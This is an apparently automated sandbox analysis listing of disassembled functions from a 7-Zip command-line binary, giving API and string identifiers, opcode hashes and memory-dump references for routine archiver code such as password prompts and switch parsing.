                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: CriticalSectionfputs$EnterLeavefree
                                                                • String ID: :
                                                                • API String ID: 1989314732-3653984579
                                                                • Opcode ID: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
                                                                • Instruction ID: 40417d12480a0d99ead8519d4933c57c31c4a2c8bcb22e824df204fa3ea24a40
                                                                • Opcode Fuzzy Hash: c7219ff94ad641548069c3c2d821b28e0e7cb5fb03aed72e0eb85cefbeb7bda8
                                                                • Instruction Fuzzy Hash: 93311A72200A40D1DB569F25D8943ED2320F798BA9F585236DE6D4B7A8CF78C889C310
                                                                APIs
                                                                Strings
                                                                • Enter password (will not be echoed):, xrefs: 0015CE69
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ConsoleMode$Handlefflushfputs
                                                                • String ID: Enter password (will not be echoed):
                                                                • API String ID: 108775803-3720017889
                                                                • Opcode ID: 36bd84e05aa982e1fa57c2f2cf585279101811381d58ea0075c40767b01f72a6
                                                                • Instruction ID: 685de5bff94a846a7fd7c70d12e47bea1447a56d4a7c306682e3c6d3bc401483
                                                                • Opcode Fuzzy Hash: 36bd84e05aa982e1fa57c2f2cf585279101811381d58ea0075c40767b01f72a6
                                                                • Instruction Fuzzy Hash: 0F218B32305741C6EA189F659D553696361AB84BB2F185225EE3A4F3E4DB7CC889D340
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: fputsfree
                                                                • String ID: Can not open the file$The archive is open with offset$The file is open$WARNING:
                                                                • API String ID: 2581285248-3393983761
                                                                • Opcode ID: 0c83fb30cb70f6a2b984ecfa0bcc3b2de66b99b3f440bfbea28bcb7ca7027a60
                                                                • Instruction ID: 6f942cb80f7d4b0d2e4c4756984878a0e578c37adbecd1150f3693a6199c1aec
                                                                • Opcode Fuzzy Hash: 0c83fb30cb70f6a2b984ecfa0bcc3b2de66b99b3f440bfbea28bcb7ca7027a60
                                                                • Instruction Fuzzy Hash: 95213E62310A45E5CE25EF25E8503DD6720F7AABE5F484221EE6E47365EF38C69AC700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: Version$AddressHandleModuleProc
                                                                • String ID: SetDefaultDllDirectories$kernel32.dll
                                                                • API String ID: 2268189529-2102062458
                                                                • Opcode ID: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                                                • Instruction ID: f2097bf1b5f124c7f2ed154afde147ce2051cd45895794ad5597969b938d1259
                                                                • Opcode Fuzzy Hash: 7a4e38354ab5005c4356f78164d2e6d32f5e0198e07bcfd6bf58e12f2388e286
                                                                • Instruction Fuzzy Hash: 49F05834204A02C2EF309B10F8543EA23A0FBC970AF440228D66E0A2B0EF3CC64ECB01
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                • Instruction ID: 5d1eb2d47945032c943475f9fac525057365c342a2fb3198d58e15bcc527c449
                                                                • Opcode Fuzzy Hash: b12077aa1a38d381980969ace034f6b3563fad09e3fe92ca21f67a48a02744cb
                                                                • Instruction Fuzzy Hash: 5C71042321C6C096CA30EB25E4546AEFB75F7DA750FA41112EBDA43BA9CF78C945CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID:
                                                                • API String ID: 1534225298-0
                                                                • Opcode ID: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                • Instruction ID: 2d85dfc21c9dadd845feeea00062bb42aea4e1a73e5f8edb1e8a4ae1c30b2633
                                                                • Opcode Fuzzy Hash: 13471f8a4ad2e7cf6aac41453100c4caf2e4d0bde65bb17a80b5ab02e2c60358
                                                                • Instruction Fuzzy Hash: 0C41F72220C6C095CF39EF25D4912AD7760D7A2B9CF185111EB9A07799EFB9C5C6C341
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: freememmove$ExceptionThrowmalloc
                                                                • String ID:
                                                                • API String ID: 1818558235-0
                                                                • Opcode ID: 198f322d7e3605dd07b0a7db7330dd27ffa8d5d8ef2ff35b5f10ecada0f47089
                                                                • Instruction ID: 4d9bad8d61d16cf6b48e003d6c4daf40714821cfeed12e792f3076aa47ac4f21
                                                                • Opcode Fuzzy Hash: 198f322d7e3605dd07b0a7db7330dd27ffa8d5d8ef2ff35b5f10ecada0f47089
                                                                • Instruction Fuzzy Hash: FA313AB27112948BCB64DF7AE49256DB3E4E758FD87184126DF299B708DB30D8D2CB80
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                • Instruction ID: 72731ef7396c26a34538dacf22faf21c0e93c2d93dcf617153d961a263291045
                                                                • Opcode Fuzzy Hash: 5bbcb3d30417cb4540914b84c838161a17fbf1d04a96b1a44235b1ed78704236
                                                                • Instruction Fuzzy Hash: 4DF0302224A59095CA28FF32C4956AE6751FBD7F81F092571EB4E63725CF38C456C704
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                • Instruction ID: 2b62bca280be50baf187ff3fdb504b1d00dbfdf6f84479aebfa066c925cd78ad
                                                                • Opcode Fuzzy Hash: f923bc8cdedd78b2b3edc0c739dd55c56a96e84a99f4fb77f0cef0815a61bf65
                                                                • Instruction Fuzzy Hash: 02F0302224A98051CA28FF32C4A56AF6720FBD3F85F091171EB5E23711CF38C496C304
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                • Instruction ID: af905fe9c44fd04a8cd6d078b2c02df40df0e9e128ff2033d63b96f14b1fda92
                                                                • Opcode Fuzzy Hash: 2522e248d28b65a1e432d56d56702000484c5aa2c33acbb552cec4aae837ae87
                                                                • Instruction Fuzzy Hash: 64F0302228AA8151CA28FF32C895AAF6720FBD3F81F091171EB4E63711CF38C496C704
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                • Instruction ID: b13139be7d3d8dcb7ccbea13649c225b0bfe1a060cb408b5c088d6cfda2e4b4c
                                                                • Opcode Fuzzy Hash: eef51832cb1860b1a47471d2ecdbd40fe6516d0eb3dd3788043c37f3bbfc7144
                                                                • Instruction Fuzzy Hash: 30F0D02224A59095CA28FF32D4A56AE6721FBD7F81F091571EB4E53715CF38C456C704
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                • Instruction ID: 449db28fa88b8cbdb3e8cf9200031aef8cbdb8ea3490f4f9ea939d009eca3559
                                                                • Opcode Fuzzy Hash: c5174ab1f7993f2eec1200e5e986d705cda821f000588a3ae1e3b292e3927ade
                                                                • Instruction Fuzzy Hash: D2F0F42224A59055CA28FF32C4556AF6711FBD7F81F091571EB4E63715CF38C496C704
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID:
                                                                • API String ID: 1294909896-0
                                                                • Opcode ID: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                • Instruction ID: ddbacca73b52e3ab583eac3ce332dc7506a156c94ef934f002e0b537da9eb0d6
                                                                • Opcode Fuzzy Hash: 73516b05c5aded9222374f9846cd335e674db6f98022afe4c7a0822642a89c91
                                                                • Instruction Fuzzy Hash: 2EF0DA2224698095CA18FF32D4616AF6320FBD7F81F092571EB4E63721DF38C496C709
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$fputsmemset
                                                                • String ID:
                                                                • API String ID: 469995913-0
                                                                • Opcode ID: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                • Instruction ID: 2c21f90644a6b2e6909473b56e2624c6d6c79b6e5305fa2d497ebf65218c6c31
                                                                • Opcode Fuzzy Hash: d08ec6cc8013b459c16a183cb8820a8405a66458fcd2ec61ca7be2be00b49645
                                                                • Instruction Fuzzy Hash: 13F0A922251940A1CB58FF31D8925AD2321E7E3F68B085371EF6D573AACF30C8A6C348
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmovewcscmp
                                                                • String ID:
                                                                • API String ID: 3584677832-0
                                                                • Opcode ID: c7d24e90d75f8b1a8df411daada06ff9b67f26deec57412286e52ff39d8a267a
                                                                • Instruction ID: 31d3f1c5b6ecfdffe359ff3a583b0613125048e98eb861fd34fb37654b1f962c
                                                                • Opcode Fuzzy Hash: c7d24e90d75f8b1a8df411daada06ff9b67f26deec57412286e52ff39d8a267a
                                                                • Instruction Fuzzy Hash: F951A173201A84A6CF24EF16D4911AD7761F3A4BD8F55C136EBAA4B728DF35C986CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free
                                                                • String ID: Incorrect switch postfix:$Multiple instances for switch:$Too long switch:$Too short switch:$Unknown switch:
                                                                • API String ID: 1294909896-2104980125
                                                                • Opcode ID: ed70e3db481bbb30983a976b6095b32a572669940faca3c9e13180f1720175d4
                                                                • Instruction ID: 4a1b870356697d4580303ecd0c320ac92a8de5ab31b3cf676f83d38b634209dd
                                                                • Opcode Fuzzy Hash: ed70e3db481bbb30983a976b6095b32a572669940faca3c9e13180f1720175d4
                                                                • Instruction Fuzzy Hash: 6551D172214A94B6CF78EF24D4406EDB762F392798F849231DB9A47B55EB34C9C6CB00
                                                                APIs
                                                                • free.MSVCRT ref: 001204EE
                                                                  • Part of subcall function 0011FEC8: _CxxThrowException.MSVCRT ref: 0011FF2F
                                                                  • Part of subcall function 0011FEC8: free.MSVCRT ref: 0011FFAE
                                                                  • Part of subcall function 0011FEC8: _CxxThrowException.MSVCRT ref: 0011FFD1
                                                                  • Part of subcall function 0011FEC8: _CxxThrowException.MSVCRT ref: 0011FFF7
                                                                  • Part of subcall function 0011FEC8: _CxxThrowException.MSVCRT ref: 0012002B
                                                                • free.MSVCRT ref: 00120523
                                                                • _CxxThrowException.MSVCRT ref: 00120564
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ExceptionThrow$free
                                                                • String ID: Incorrect wildcard type marker$Too short switch
                                                                • API String ID: 3129652135-1817034180
                                                                • Opcode ID: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                • Instruction ID: 749ae5620c8792367737cf7c14fa287750bf118c365ace29b1cafd16cf4ce5ba
                                                                • Opcode Fuzzy Hash: f2458bf291f458b2712c5f00df2031021bba44effe0b8784fcef15973866768f
                                                                • Instruction Fuzzy Hash: 1751D2232086E485CB26EF15F4507EEBB70F399794F558226EF8907B56DB38C596CB00
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$memmove
                                                                • String ID: #
                                                                • API String ID: 1534225298-1885708031
                                                                • Opcode ID: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                • Instruction ID: 00ad4cacc9ee172861b5a0ef0b829687156bd0fa20c5894ebe11ad99ce2ebee3
                                                                • Opcode Fuzzy Hash: 88dd9615235185287fb0baae77512b6b30fd0ad49e52e1feae422806fc2f9e0a
                                                                • Instruction Fuzzy Hash: 39516326314B8482CB64DF26E49079EB7A1F7D9B94F584221EB9E83765DF3CC849C700
                                                                APIs
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: memsetstrlen$fputs
                                                                • String ID:
                                                                • API String ID: 2256168112-2735817509
                                                                • Opcode ID: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                • Instruction ID: 9d67cecabf330bf74fe23adef5a811e7623df5977fef0205a787a0634ece5560
                                                                • Opcode Fuzzy Hash: ad0d7bef1b919bc72df3f5cae30fb1075d7da1c7e795fc3f1bc43048049e5982
                                                                • Instruction Fuzzy Hash: 3041E8637047C0D5CB38DB25F4513AE67A1F7A5B88F485526DEAA0B719CF78C589CB00
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ErrorLastfree
                                                                • String ID:
                                                                • API String ID: 2167247754-0
                                                                • Opcode ID: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                • Instruction ID: dd06963e353bcbd7ac5309ad2c926c9d6e86a5f5f0f57ce17d3e5d3105f3effe
                                                                • Opcode Fuzzy Hash: 20cadcee4a29e65714f589434cd172a3e6a1a379c9859cc67ae3c45b41779d1f
                                                                • Instruction Fuzzy Hash: C041992121864495CA24EB14E4A13EEB360F7E2764F504336EAFD47AD9DF38C9C6C705
                                                                APIs
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: free$FileMove
                                                                • String ID:
                                                                • API String ID: 288606353-0
                                                                • Opcode ID: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                • Instruction ID: 25f6a094c070f6f231c30b195a40fc45bd6a4a0926f531f2f8ee41659bc5e453
                                                                • Opcode Fuzzy Hash: c934d79802b123a65afdecf3c3c141401825e728ddd7393a0425fdd743619d48
                                                                • Instruction Fuzzy Hash: E411A52324595095CA28EE25F8506EB5B209FD2BE0F485231FEAA57665DF3ACCC6C700
                                                                APIs
                                                                  • Part of subcall function 0011794C: FindClose.KERNELBASE ref: 0011795E
                                                                • SetLastError.KERNEL32 ref: 00117BAA
                                                                • SetLastError.KERNEL32 ref: 00117BB9
                                                                • FindFirstStreamW.KERNELBASE ref: 00117BDB
                                                                • GetLastError.KERNEL32 ref: 00117BEA
                                                                Memory Dump Source
                                                                • Source File: 00000014.00000002.3716565872.0000000000111000.00000020.00000001.01000000.00000008.sdmp, Offset: 00110000, based on PE: true
                                                                • Associated: 00000014.00000002.3716540046.0000000000110000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716632499.000000000015F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716659407.000000000017C000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 00000014.00000002.3716677500.000000000017F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_20_2_110000_7z.jbxd
                                                                Similarity
                                                                • API ID: ErrorLast$Find$CloseFirstStream
                                                                • String ID:
                                                                • API String ID: 4071060300-0
                                                                • Opcode ID: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
                                                                • Instruction ID: 999c0a533bcb7dc0a526992cb629ada0664d2748d1a37b5da904f558ed1f7f15
                                                                • Opcode Fuzzy Hash: a6e64fabe6673e363aad17d05dfc3ab5172c88e9485b2e4bf2568c0b8856aec2
